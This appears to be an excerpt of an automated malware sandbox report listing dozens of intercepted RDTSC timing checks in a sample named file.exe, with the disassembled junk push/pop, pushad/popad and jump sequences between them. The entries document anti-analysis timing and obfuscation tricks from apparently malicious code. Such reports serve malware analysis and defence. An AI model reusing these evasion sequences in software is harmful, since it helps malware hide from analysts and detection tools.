Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6983DC second address: 6983E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69852A second address: 698530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 698530 second address: 698538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987B7 second address: 6987BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987BC second address: 6987C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987C2 second address: 6987C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987C6 second address: 6987CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987CA second address: 6987EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E644F7535h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6987EF second address: 6987F9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69913F second address: 699145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 699912 second address: 699916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A07EA second address: 6A07FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jc 00007F6E644F753Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A07FC second address: 6A082E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6E64DC24C8h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A082E second address: 6A0845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7533h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A0845 second address: 6A0849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A0374 second address: 6A037A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A04E6 second address: 6A04EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B0777 second address: 6B0782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B0782 second address: 6B0792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6E64DC24B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B80D0 second address: 6B80DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F6E644F7528h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C10C2 second address: 6C10C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C10C8 second address: 6C10E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C10E0 second address: 6C10E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C47CF second address: 6C47D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C7D51 second address: 6C7D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C7B68 second address: 6C7B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7538h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C7B86 second address: 6C7BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E64DC24C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE538 second address: 6CE53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE53E second address: 6CE542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE542 second address: 6CE552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E644F752Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE552 second address: 6CE557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCD81 second address: 6CCD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCD85 second address: 6CCD89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCD89 second address: 6CCDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007F6E644F752Eh 0x0000000e jg 00007F6E644F7526h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCF53 second address: 6CCF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CCF57 second address: 6CCF6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F6E644F752Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CD0CC second address: 6CD0D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CD0D6 second address: 6CD0EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CE222 second address: 6CE237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6E64DC24BBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D1421 second address: 6D143F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7534h 0x00000007 jc 00007F6E644F7526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D7554 second address: 6D755E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D755E second address: 6D7562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D9846 second address: 6D984A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D984A second address: 6D985F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DAE1C second address: 6DAE22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DAE22 second address: 6DAE2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DAE2D second address: 6DAE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E12D4 second address: 6E12E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E12E4 second address: 6E1305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E64DC24C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E1305 second address: 6E1309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6EDCAE second address: 6EDCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2EEF second address: 6F2F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F7538h 0x00000009 jnc 00007F6E644F7526h 0x0000000f popad 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007F6E644F7526h 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2F22 second address: 6F2F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2F26 second address: 6F2F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2F2C second address: 6F2F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2F3D second address: 6F2F52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F29F2 second address: 6F2A10 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6E64DC24BCh 0x00000008 pop edx 0x00000009 push ecx 0x0000000a jmp 00007F6E64DC24BBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F2A10 second address: 6F2A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 je 00007F6E644F7526h 0x0000000f jmp 00007F6E644F7531h 0x00000014 jmp 00007F6E644F7533h 0x00000019 jmp 00007F6E644F7537h 0x0000001e popad 0x0000001f pushad 0x00000020 jc 00007F6E644F7526h 0x00000026 jp 00007F6E644F7526h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8B84 second address: 6F8B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24BEh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E67 second address: 6F8E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E6D second address: 6F8E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E71 second address: 6F8E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E75 second address: 6F8E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F8E85 second address: 6F8EA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F6E644F7526h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d je 00007F6E644F755Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F6E644F7526h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F901E second address: 6F9033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 js 00007F6E64DC24B6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6F9187 second address: 6F919B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6E644F7532h 0x0000000c js 00007F6E644F7526h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FC905 second address: 6FC909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCACD second address: 6FCAD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCB59 second address: 6FCB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 nop 0x00000007 movzx edx, cx 0x0000000a push 00000004h 0x0000000c jng 00007F6E64DC24B9h 0x00000012 call 00007F6E64DC24B9h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F6E64DC24B8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCB81 second address: 6FCB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCB87 second address: 6FCB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCB8B second address: 6FCBE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007F6E644F7528h 0x00000013 push eax 0x00000014 jmp 00007F6E644F7534h 0x00000019 pop eax 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F6E644F752Fh 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6E644F752Bh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCBE0 second address: 6FCBF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCBF5 second address: 6FCC0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6E644F752Ch 0x00000008 jp 00007F6E644F7526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FCC0E second address: 6FCC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01990 second address: 4A019D5 instructions: 0x00000000 rdtsc 0x00000002 mov bx, BD1Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F6E644F752Fh 0x0000000e xor si, A9CEh 0x00000013 jmp 00007F6E644F7539h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esp], ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop eax 0x00000022 mov dx, 883Ah 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A019D5 second address: 4A019F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A019F0 second address: 4A019F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A019F4 second address: 4A01A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [7721188Ch] 0x0000000e mov edi, edi 0x00000010 push ebp 0x00000011 mov ebp, esp 0x00000013 push ecx 0x00000014 mov ecx, dword ptr [7FFE0004h] 0x0000001a mov dword ptr [ebp-04h], ecx 0x0000001d cmp ecx, 01000000h 0x00000023 jc 00007F6E64DF3F95h 0x00000029 mov eax, 7FFE0320h 0x0000002e mov eax, dword ptr [eax] 0x00000030 mul ecx 0x00000032 shrd eax, edx, 00000018h 0x00000036 mov esp, ebp 0x00000038 pop ebp 0x00000039 ret 0x0000003a pushad 0x0000003b jmp 00007F6E64DC24BBh 0x00000040 call 00007F6E64DC24C8h 0x00000045 mov ebx, ecx 0x00000047 pop ecx 0x00000048 popad 0x00000049 pop ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push ecx 0x0000004e pop edi 0x0000004f mov cx, DA11h 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01A35 second address: 4A01A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F752Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01A43 second address: 4A01A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01A47 second address: 4A018E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a xor esi, eax 0x0000000c lea eax, dword ptr [ebp-10h] 0x0000000f push eax 0x00000010 call 00007F6E68AEF671h 0x00000015 mov edi, edi 0x00000017 pushad 0x00000018 mov bh, cl 0x0000001a mov ebx, 6D7206EEh 0x0000001f popad 0x00000020 push esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push edx 0x00000025 pop ecx 0x00000026 mov edx, 0C64079Eh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A018E0 second address: 4A01901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01901 second address: 4A01905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01905 second address: 4A01909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01909 second address: 4A0190F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0190F second address: 4A01945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E64DC24C2h 0x00000009 and eax, 253FB0C8h 0x0000000f jmp 00007F6E64DC24BBh 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01945 second address: 4A01949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01949 second address: 4A0194D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0194D second address: 4A01953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01953 second address: 4A01959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01959 second address: 4A0195D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0195D second address: 4A01972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 5FA6A935h 0x00000011 mov bx, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01972 second address: 4A01978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01978 second address: 4A0197C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
